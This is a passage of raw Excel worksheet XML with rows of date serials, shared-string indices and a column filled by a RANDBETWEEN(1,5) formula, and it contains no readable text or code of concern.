        <v>19916</v>
      </c>
      <c r="F22071">
        <f t="shared" ca="1" si="344"/>
        <v>3</v>
      </c>
    </row>
    <row r="22072" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22072" s="1">
        <v>43056.0471875</v>
      </c>
      <c r="C22072" t="s">
        <v>140</v>
      </c>
      <c r="D22072" t="s">
        <v>847</v>
      </c>
      <c r="E22072" s="2" t="s">
        <v>19917</v>
      </c>
      <c r="F22072">
        <f t="shared" ca="1" si="344"/>
        <v>3</v>
      </c>
    </row>
    <row r="22073" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22073" s="1">
        <v>43056.005740740744</v>
      </c>
      <c r="C22073" t="s">
        <v>41</v>
      </c>
      <c r="E22073" t="s">
        <v>19918</v>
      </c>
      <c r="F22073">
        <f t="shared" ca="1" si="344"/>
        <v>3</v>
      </c>
    </row>
    <row r="22074" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22074" s="1">
        <v>43055.77784722222</v>
      </c>
      <c r="C22074" t="s">
        <v>454</v>
      </c>
      <c r="D22074" t="s">
        <v>667</v>
      </c>
      <c r="E22074" t="s">
        <v>19919</v>
      </c>
      <c r="F22074">
        <f t="shared" ca="1" si="344"/>
        <v>1</v>
      </c>
    </row>
    <row r="22075" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A22075" s="1">
        <v>43055.748935185184</v>
      </c>
      <c r="C22075" t="s">
        <v>1510</v>
      </c>
      <c r="D22075" t="s">
        <v>39</v>
      </c>
      <c r="E22075" s="2" t="s">
        <v>19920</v>
      </c>
      <c r="F22075">
        <f t="shared" ca="1" si="344"/>
        <v>1</v>
      </c>
    </row>
    <row r="22076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22076" s="1">
        <v>43055.733912037038</v>
      </c>
      <c r="C22076" t="s">
        <v>6</v>
      </c>
      <c r="D22076" t="s">
        <v>25</v>
      </c>
      <c r="E22076" t="s">
        <v>19921</v>
      </c>
      <c r="F22076">
        <f t="shared" ca="1" si="344"/>
        <v>1</v>
      </c>
    </row>
    <row r="22077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22077" s="1">
        <v>43055.733749999999</v>
      </c>
      <c r="C22077" t="s">
        <v>10</v>
      </c>
      <c r="D22077" t="s">
        <v>6</v>
      </c>
      <c r="E22077" t="s">
        <v>19922</v>
      </c>
      <c r="F22077">
        <f t="shared" ca="1" si="344"/>
        <v>1</v>
      </c>
    </row>
    <row r="22078" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22078" s="1">
        <v>43055.731689814813</v>
      </c>
      <c r="C22078" t="s">
        <v>6829</v>
      </c>
      <c r="D22078" t="s">
        <v>89</v>
      </c>
      <c r="E22078" t="s">
        <v>19923</v>
      </c>
      <c r="F22078">
        <f t="shared" ca="1" si="344"/>
        <v>5</v>
      </c>
    </row>
    <row r="22079" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22079" s="1">
        <v>43055.694351851853</v>
      </c>
      <c r="C22079" t="s">
        <v>10</v>
      </c>
      <c r="D22079" t="s">
        <v>36</v>
      </c>
      <c r="E22079" t="s">
        <v>19924</v>
      </c>
      <c r="F22079">
        <f t="shared" ca="1" si="344"/>
        <v>4</v>
      </c>
    </row>
    <row r="22080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22080" s="1">
        <v>43055.667997685188</v>
      </c>
      <c r="C22080" t="s">
        <v>10</v>
      </c>
      <c r="D22080" t="s">
        <v>20</v>
      </c>
      <c r="E22080" t="s">
        <v>19925</v>
      </c>
      <c r="F22080">
        <f t="shared" ca="1" si="344"/>
        <v>2</v>
      </c>
    </row>
    <row r="22081" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22081" s="1">
        <v>43055.651412037034</v>
      </c>
      <c r="C22081" t="s">
        <v>10</v>
      </c>
      <c r="D22081" t="s">
        <v>374</v>
      </c>
      <c r="E22081" s="2" t="s">
        <v>19926</v>
      </c>
      <c r="F22081">
        <f t="shared" ca="1" si="344"/>
        <v>4</v>
      </c>
    </row>
    <row r="22082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22082" s="1">
        <v>43055.648877314816</v>
      </c>
      <c r="C22082" t="s">
        <v>10</v>
      </c>
      <c r="D22082" t="s">
        <v>112</v>
      </c>
      <c r="E22082" t="s">
        <v>19927</v>
      </c>
      <c r="F22082">
        <f t="shared" ref="F22082:F22145" ca="1" si="345">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="22083" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A22083" s="1">
        <v>43055.647476851853</v>
      </c>
      <c r="C22083" t="s">
        <v>314</v>
      </c>
      <c r="D22083" t="s">
        <v>107</v>
      </c>
      <c r="E22083" s="2" t="s">
        <v>19928</v>
      </c>
      <c r="F22083">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22084" s="1">
        <v>43055.633020833331</v>
      </c>
      <c r="C22084" t="s">
        <v>6</v>
      </c>
      <c r="D22084" t="s">
        <v>821</v>
      </c>
      <c r="E22084" t="s">
        <v>19929</v>
      </c>
      <c r="F22084">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22085" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22085" s="1">
        <v>43055.631145833337</v>
      </c>
      <c r="C22085" t="s">
        <v>10</v>
      </c>
      <c r="D22085" t="s">
        <v>20</v>
      </c>
      <c r="E22085" s="2" t="s">
        <v>19930</v>
      </c>
      <c r="F22085">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22086" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22086" s="1">
        <v>43055.575868055559</v>
      </c>
      <c r="C22086" t="s">
        <v>10</v>
      </c>
      <c r="D22086" t="s">
        <v>6</v>
      </c>
      <c r="E22086" s="2" t="s">
        <v>19931</v>
      </c>
      <c r="F22086">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22087" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A22087" s="1">
        <v>43055.57576388889</v>
      </c>
      <c r="C22087" t="s">
        <v>10</v>
      </c>
      <c r="D22087" t="s">
        <v>89</v>
      </c>
      <c r="E22087" s="2" t="s">
        <v>19932</v>
      </c>
      <c r="F22087">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22088" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22088" s="1">
        <v>43055.574062500003</v>
      </c>
      <c r="C22088" t="s">
        <v>48</v>
      </c>
      <c r="E22088" s="2" t="s">
        <v>19933</v>
      </c>
      <c r="F22088">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22089" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22089" s="1">
        <v>43055.562731481485</v>
      </c>
      <c r="C22089" t="s">
        <v>41</v>
      </c>
      <c r="E22089" t="s">
        <v>19934</v>
      </c>
      <c r="F22089">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22090" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22090" s="1">
        <v>43055.546284722222</v>
      </c>
      <c r="C22090" t="s">
        <v>10</v>
      </c>
      <c r="D22090" t="s">
        <v>94</v>
      </c>
      <c r="E22090" t="s">
        <v>19935</v>
      </c>
      <c r="F22090">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22091" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22091" s="1">
        <v>43055.543981481482</v>
      </c>
      <c r="C22091" t="s">
        <v>10</v>
      </c>
      <c r="E22091" t="s">
        <v>19936</v>
      </c>
      <c r="F22091">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22092" s="1">
        <v>43055.504571759258</v>
      </c>
      <c r="C22092" t="s">
        <v>10</v>
      </c>
      <c r="D22092" t="s">
        <v>11</v>
      </c>
      <c r="E22092" t="s">
        <v>19937</v>
      </c>
      <c r="F22092">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22093" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22093" s="1">
        <v>43055.422094907408</v>
      </c>
      <c r="C22093" t="s">
        <v>776</v>
      </c>
      <c r="E22093" s="2" t="s">
        <v>19938</v>
      </c>
      <c r="F22093">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22094" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A22094" s="1">
        <v>43055.412430555552</v>
      </c>
      <c r="C22094" t="s">
        <v>71</v>
      </c>
      <c r="E22094" s="2" t="s">
        <v>19939</v>
      </c>
      <c r="F22094">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22095" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22095" s="1">
        <v>43055.412303240744</v>
      </c>
      <c r="C22095" t="s">
        <v>71</v>
      </c>
      <c r="E22095" t="s">
        <v>19940</v>
      </c>
      <c r="F22095">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22096" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22096" s="1">
        <v>43055.409513888888</v>
      </c>
      <c r="C22096" t="s">
        <v>10</v>
      </c>
      <c r="D22096" t="s">
        <v>86</v>
      </c>
      <c r="E22096" s="2" t="s">
        <v>19941</v>
      </c>
      <c r="F22096">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22097" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22097" s="1">
        <v>43055.401365740741</v>
      </c>
      <c r="C22097" t="s">
        <v>10</v>
      </c>
      <c r="D22097" t="s">
        <v>94</v>
      </c>
      <c r="E22097" s="2" t="s">
        <v>19942</v>
      </c>
      <c r="F22097">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22098" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22098" s="1">
        <v>43055.376388888886</v>
      </c>
      <c r="C22098" t="s">
        <v>586</v>
      </c>
      <c r="D22098" t="s">
        <v>163</v>
      </c>
      <c r="E22098" s="2" t="s">
        <v>19943</v>
      </c>
      <c r="F22098">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22099" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22099" s="1">
        <v>43055.3750462963</v>
      </c>
      <c r="C22099" t="s">
        <v>10</v>
      </c>
      <c r="D22099" t="s">
        <v>6</v>
      </c>
      <c r="E22099" t="s">
        <v>19944</v>
      </c>
      <c r="F22099">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22100" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22100" s="1">
        <v>43055.371759259258</v>
      </c>
      <c r="C22100" t="s">
        <v>65</v>
      </c>
      <c r="E22100" s="2" t="s">
        <v>19945</v>
      </c>
      <c r="F22100">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22101" s="1">
        <v>43055.358055555553</v>
      </c>
      <c r="C22101" t="s">
        <v>6</v>
      </c>
      <c r="D22101" t="s">
        <v>25</v>
      </c>
      <c r="E22101" t="s">
        <v>19946</v>
      </c>
      <c r="F22101">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22102" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A22102" s="1">
        <v>43055.352418981478</v>
      </c>
      <c r="C22102" t="s">
        <v>71</v>
      </c>
      <c r="E22102" s="2" t="s">
        <v>19947</v>
      </c>
      <c r="F22102">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22103" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22103" s="1">
        <v>43055.351087962961</v>
      </c>
      <c r="C22103" t="s">
        <v>6</v>
      </c>
      <c r="D22103" t="s">
        <v>25</v>
      </c>
      <c r="E22103" s="2" t="s">
        <v>19948</v>
      </c>
      <c r="F22103">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22104" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A22104" s="1">
        <v>43055.259166666663</v>
      </c>
      <c r="C22104" t="s">
        <v>10</v>
      </c>
      <c r="D22104" t="s">
        <v>52</v>
      </c>
      <c r="E22104" s="2" t="s">
        <v>19949</v>
      </c>
      <c r="F22104">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22105" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22105" s="1">
        <v>43055.251006944447</v>
      </c>
      <c r="C22105" t="s">
        <v>50</v>
      </c>
      <c r="E22105" s="2" t="s">
        <v>19950</v>
      </c>
      <c r="F22105">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22106" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22106" s="1">
        <v>43055.225081018521</v>
      </c>
      <c r="C22106" t="s">
        <v>41</v>
      </c>
      <c r="E22106" s="2" t="s">
        <v>19951</v>
      </c>
      <c r="F22106">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22107" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22107" s="1">
        <v>43055.196932870371</v>
      </c>
      <c r="C22107" t="s">
        <v>60</v>
      </c>
      <c r="E22107" s="2" t="s">
        <v>19952</v>
      </c>
      <c r="F22107">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22108" s="1">
        <v>43055.194976851853</v>
      </c>
      <c r="C22108" t="s">
        <v>73</v>
      </c>
      <c r="E22108" t="s">
        <v>19953</v>
      </c>
      <c r="F22108">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22109" s="1">
        <v>43055.194675925923</v>
      </c>
      <c r="C22109" t="s">
        <v>48</v>
      </c>
      <c r="E22109" t="s">
        <v>19954</v>
      </c>
      <c r="F22109">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22110" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22110" s="1">
        <v>43055.165127314816</v>
      </c>
      <c r="C22110" t="s">
        <v>41</v>
      </c>
      <c r="E22110" s="2" t="s">
        <v>19955</v>
      </c>
      <c r="F22110">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22111" s="1">
        <v>43055.137199074074</v>
      </c>
      <c r="C22111" t="s">
        <v>542</v>
      </c>
      <c r="D22111" t="s">
        <v>312</v>
      </c>
      <c r="E22111" t="s">
        <v>19956</v>
      </c>
      <c r="F22111">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22112" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A22112" s="1">
        <v>43055.025092592594</v>
      </c>
      <c r="C22112" t="s">
        <v>318</v>
      </c>
      <c r="E22112" s="2" t="s">
        <v>19957</v>
      </c>
      <c r="F22112">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22113" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22113" s="1">
        <v>43055.020949074074</v>
      </c>
      <c r="C22113" t="s">
        <v>140</v>
      </c>
      <c r="D22113" t="s">
        <v>141</v>
      </c>
      <c r="E22113" s="2" t="s">
        <v>19958</v>
      </c>
      <c r="F22113">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22114" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22114" s="1">
        <v>43054.977465277778</v>
      </c>
      <c r="C22114" t="s">
        <v>140</v>
      </c>
      <c r="D22114" t="s">
        <v>141</v>
      </c>
      <c r="E22114" s="2" t="s">
        <v>19959</v>
      </c>
      <c r="F22114">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22115" s="1">
        <v>43054.969849537039</v>
      </c>
      <c r="C22115" t="s">
        <v>41</v>
      </c>
      <c r="E22115" t="s">
        <v>19960</v>
      </c>
      <c r="F22115">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22116" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22116" s="1">
        <v>43054.936828703707</v>
      </c>
      <c r="C22116" t="s">
        <v>10</v>
      </c>
      <c r="D22116" t="s">
        <v>56</v>
      </c>
      <c r="E22116" t="s">
        <v>19961</v>
      </c>
      <c r="F22116">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22117" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A22117" s="1">
        <v>43054.908020833333</v>
      </c>
      <c r="C22117" t="s">
        <v>41</v>
      </c>
      <c r="E22117" s="2" t="s">
        <v>19962</v>
      </c>
      <c r="F22117">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22118" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22118" s="1">
        <v>43054.815787037034</v>
      </c>
      <c r="C22118" t="s">
        <v>6</v>
      </c>
      <c r="D22118" t="s">
        <v>114</v>
      </c>
      <c r="E22118" t="s">
        <v>19963</v>
      </c>
      <c r="F22118">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22119" s="1">
        <v>43054.738171296296</v>
      </c>
      <c r="C22119" t="s">
        <v>10</v>
      </c>
      <c r="D22119" t="s">
        <v>163</v>
      </c>
      <c r="E22119" t="s">
        <v>19964</v>
      </c>
      <c r="F22119">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22120" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22120" s="1">
        <v>43054.733171296299</v>
      </c>
      <c r="C22120" t="s">
        <v>140</v>
      </c>
      <c r="D22120" t="s">
        <v>381</v>
      </c>
      <c r="E22120" t="s">
        <v>19965</v>
      </c>
      <c r="F22120">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22121" s="1">
        <v>43054.694502314815</v>
      </c>
      <c r="C22121" t="s">
        <v>10</v>
      </c>
      <c r="D22121" t="s">
        <v>89</v>
      </c>
      <c r="E22121" t="s">
        <v>19966</v>
      </c>
      <c r="F22121">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22122" s="1">
        <v>43054.688136574077</v>
      </c>
      <c r="C22122" t="s">
        <v>10</v>
      </c>
      <c r="D22122" t="s">
        <v>163</v>
      </c>
      <c r="E22122" t="s">
        <v>19967</v>
      </c>
      <c r="F22122">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22123" s="1">
        <v>43054.6872337963</v>
      </c>
      <c r="C22123" t="s">
        <v>10</v>
      </c>
      <c r="D22123" t="s">
        <v>92</v>
      </c>
      <c r="E22123" t="s">
        <v>19968</v>
      </c>
      <c r="F22123">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22124" s="1">
        <v>43054.640011574076</v>
      </c>
      <c r="C22124" t="s">
        <v>10</v>
      </c>
      <c r="D22124" t="s">
        <v>374</v>
      </c>
      <c r="E22124" t="s">
        <v>19969</v>
      </c>
      <c r="F22124">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22125" s="1">
        <v>43054.625462962962</v>
      </c>
      <c r="C22125" t="s">
        <v>10</v>
      </c>
      <c r="D22125" t="s">
        <v>52</v>
      </c>
      <c r="E22125" t="s">
        <v>19970</v>
      </c>
      <c r="F22125">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22126" s="1">
        <v>43054.612384259257</v>
      </c>
      <c r="C22126" t="s">
        <v>6</v>
      </c>
      <c r="D22126" t="s">
        <v>25</v>
      </c>
      <c r="E22126" t="s">
        <v>19971</v>
      </c>
      <c r="F22126">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22127" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22127" s="1">
        <v>43054.600254629629</v>
      </c>
      <c r="C22127" t="s">
        <v>60</v>
      </c>
      <c r="E22127" t="s">
        <v>19972</v>
      </c>
      <c r="F22127">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22128" s="1">
        <v>43054.562905092593</v>
      </c>
      <c r="C22128" t="s">
        <v>6</v>
      </c>
      <c r="D22128" t="s">
        <v>25</v>
      </c>
      <c r="E22128" t="s">
        <v>32</v>
      </c>
      <c r="F22128">
        <f t="shared" ca="1" si="345"/>
        <v>5</v>
      </c>
    </row>
    <row r="22129" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22129" s="1">
        <v>43054.557071759256</v>
      </c>
      <c r="C22129" t="s">
        <v>10</v>
      </c>
      <c r="D22129" t="s">
        <v>36</v>
      </c>
      <c r="E22129" s="2" t="s">
        <v>19973</v>
      </c>
      <c r="F22129">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22130" s="1">
        <v>43054.55296296296</v>
      </c>
      <c r="C22130" t="s">
        <v>41</v>
      </c>
      <c r="E22130" t="s">
        <v>19974</v>
      </c>
      <c r="F22130">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22131" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22131" s="1">
        <v>43054.548402777778</v>
      </c>
      <c r="C22131" t="s">
        <v>71</v>
      </c>
      <c r="E22131" t="s">
        <v>19975</v>
      </c>
      <c r="F22131">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22132" s="1">
        <v>43054.543414351851</v>
      </c>
      <c r="C22132" t="s">
        <v>10</v>
      </c>
      <c r="D22132" t="s">
        <v>17</v>
      </c>
      <c r="E22132" t="s">
        <v>19976</v>
      </c>
      <c r="F22132">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22133" s="1">
        <v>43054.54310185185</v>
      </c>
      <c r="C22133" t="s">
        <v>10</v>
      </c>
      <c r="D22133" t="s">
        <v>263</v>
      </c>
      <c r="E22133" t="s">
        <v>19977</v>
      </c>
      <c r="F22133">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22134" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22134" s="1">
        <v>43054.53701388889</v>
      </c>
      <c r="C22134" t="s">
        <v>10</v>
      </c>
      <c r="D22134" t="s">
        <v>89</v>
      </c>
      <c r="E22134" s="2" t="s">
        <v>19978</v>
      </c>
      <c r="F22134">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22135" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22135" s="1">
        <v>43054.527141203704</v>
      </c>
      <c r="C22135" t="s">
        <v>10</v>
      </c>
      <c r="D22135" t="s">
        <v>36</v>
      </c>
      <c r="E22135" t="s">
        <v>19979</v>
      </c>
      <c r="F22135">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22136" s="1">
        <v>43054.510636574072</v>
      </c>
      <c r="C22136" t="s">
        <v>10</v>
      </c>
      <c r="D22136" t="s">
        <v>6</v>
      </c>
      <c r="E22136" t="s">
        <v>19980</v>
      </c>
      <c r="F22136">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22137" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22137" s="1">
        <v>43054.503252314818</v>
      </c>
      <c r="C22137" t="s">
        <v>41</v>
      </c>
      <c r="E22137" s="2" t="s">
        <v>19981</v>
      </c>
      <c r="F22137">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22138" s="1">
        <v>43054.488298611112</v>
      </c>
      <c r="C22138" t="s">
        <v>10</v>
      </c>
      <c r="D22138" t="s">
        <v>244</v>
      </c>
      <c r="E22138" t="s">
        <v>19982</v>
      </c>
      <c r="F22138">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22139" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22139" s="1">
        <v>43054.485844907409</v>
      </c>
      <c r="C22139" t="s">
        <v>10</v>
      </c>
      <c r="D22139" t="s">
        <v>158</v>
      </c>
      <c r="E22139" t="s">
        <v>19983</v>
      </c>
      <c r="F22139">
        <f t="shared" ca="1" si="345"/>
        <v>3</v>
      </c>
    </row>
    <row r="22140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22140" s="1">
        <v>43054.485092592593</v>
      </c>
      <c r="C22140" t="s">
        <v>10</v>
      </c>
      <c r="D22140" t="s">
        <v>46</v>
      </c>
      <c r="E22140" t="s">
        <v>19984</v>
      </c>
      <c r="F22140">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22141" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22141" s="1">
        <v>43054.476597222223</v>
      </c>
      <c r="C22141" t="s">
        <v>2210</v>
      </c>
      <c r="E22141" s="2" t="s">
        <v>19985</v>
      </c>
      <c r="F22141">
        <f t="shared" ca="1" si="345"/>
        <v>4</v>
      </c>
    </row>
    <row r="22142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22142" s="1">
        <v>43054.466574074075</v>
      </c>
      <c r="C22142" t="s">
        <v>10</v>
      </c>
      <c r="D22142" t="s">
        <v>112</v>
      </c>
      <c r="E22142" t="s">
        <v>19986</v>
      </c>
      <c r="F22142">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22143" s="1">
        <v>43054.465081018519</v>
      </c>
      <c r="C22143" t="s">
        <v>16</v>
      </c>
      <c r="E22143" t="s">
        <v>19987</v>
      </c>
      <c r="F22143">
        <f t="shared" ca="1" si="345"/>
        <v>1</v>
      </c>
    </row>
    <row r="22144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22144" s="1">
        <v>43054.454444444447</v>
      </c>
      <c r="C22144" t="s">
        <v>10</v>
      </c>
      <c r="D22144" t="s">
        <v>178</v>
      </c>
      <c r="E22144" t="s">
        <v>19988</v>
      </c>
      <c r="F22144">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22145" s="1">
        <v>43054.451736111114</v>
      </c>
      <c r="C22145" t="s">
        <v>1408</v>
      </c>
      <c r="D22145" t="s">
        <v>229</v>
      </c>
      <c r="E22145" t="s">
        <v>19989</v>
      </c>
      <c r="F22145">
        <f t="shared" ca="1" si="345"/>
        <v>2</v>
      </c>
    </row>
    <row r="22146" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22146" s="1">
        <v>43054.441851851851</v>
      </c>
      <c r="C22146" t="s">
        <v>10</v>
      </c>
      <c r="D22146" t="s">
        <v>271</v>
      </c>
      <c r="E22146" t="s">
        <v>19990</v>
      </c>
      <c r="F22146">
        <f t="shared" ref="F22146:F22209" ca="1" si="346">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="22147" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22147" s="1">
        <v>43054.441481481481</v>
      </c>
      <c r="C22147" t="s">
        <v>10</v>
      </c>
      <c r="D22147" t="s">
        <v>36</v>
      </c>
      <c r="E22147" s="2" t="s">
        <v>19991</v>
      </c>
      <c r="F22147">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22148" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A22148" s="1">
        <v>43054.368935185186</v>
      </c>
      <c r="C22148" t="s">
        <v>2745</v>
      </c>
      <c r="D22148" t="s">
        <v>374</v>
      </c>
      <c r="E22148" s="2" t="s">
        <v>19992</v>
